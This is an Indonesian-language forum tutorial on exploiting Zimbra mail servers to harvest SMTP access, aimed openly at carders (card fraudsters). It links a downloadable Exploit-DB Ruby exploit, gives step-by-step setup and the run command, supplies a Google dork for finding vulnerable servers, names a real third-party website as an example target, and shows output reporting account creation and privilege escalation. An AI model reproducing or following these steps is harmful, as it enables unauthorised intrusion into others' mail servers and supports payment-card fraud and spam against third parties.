Tutorial Exploit Zimbra (Untuk mencari SMTP)

  Ketemu lagi ama Ane Agan Cogan  Karena seiringnya perubahan Zaman ane jd ganti Profesi 
Yang dulu Gamers (doyan ngecheat, cheatnya ngemis pula  ) skrg jadi ***** Terserah ente mau nyebut apa 
Yukk langsung aja To The Point

Di sini ane mau ngasih tutorial EXPLOIT Zimbra atau Untuk mencari SMTP(Send Mail To Protocol)
Untuk para Carder pasti ngerti lah apa fungsi dan kegunaan SMTP

Wajib DownloadAplikasi ruby
Exploitd-DB mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip


Langkah Installasi dan cara memperintahkan di cmd

• Instal ruby samapai selesai di program files c:\
• Download exploit db nya
• Setalah di download jang lupa extrak file nya di program file ruby
• ruby - bin; extrak di situ
• Buka cmd
• Jalan kan perintah nya  
• "cd c:\ruby\bin" *tanpakutip
• ruby run.rb -t http://www.target.com

Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork

inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri 


Langkah mencari target :

• Buka google.com
• Masukkan dork diatas tadi kedalam google
• Contoh : http://www.linuxquestions.org/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
  ambil website domainnya saja, http://www.linuxquestions.org
• Copy dan Paste di cmd yang tadi sudah diberi perintah,
  c:/ruby/bin>ruby run.rb -t  http://www.linuxquestions.org
• Kemudian liat hasilnya

Jika sukses ada notice sepeti ini di cmd

[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
-

Jika Image Rusak

NB :

- Untuk nama folder "ruby" *tanpakutip (huruf kecil)
- Wajib install di Local disk C 


Sorry for bad editing (bukan jago ngedit, bukan forumer sesungguhnya )

Credit by : Khalfin Mohamad Fadillah ( ./Syko )

Tweet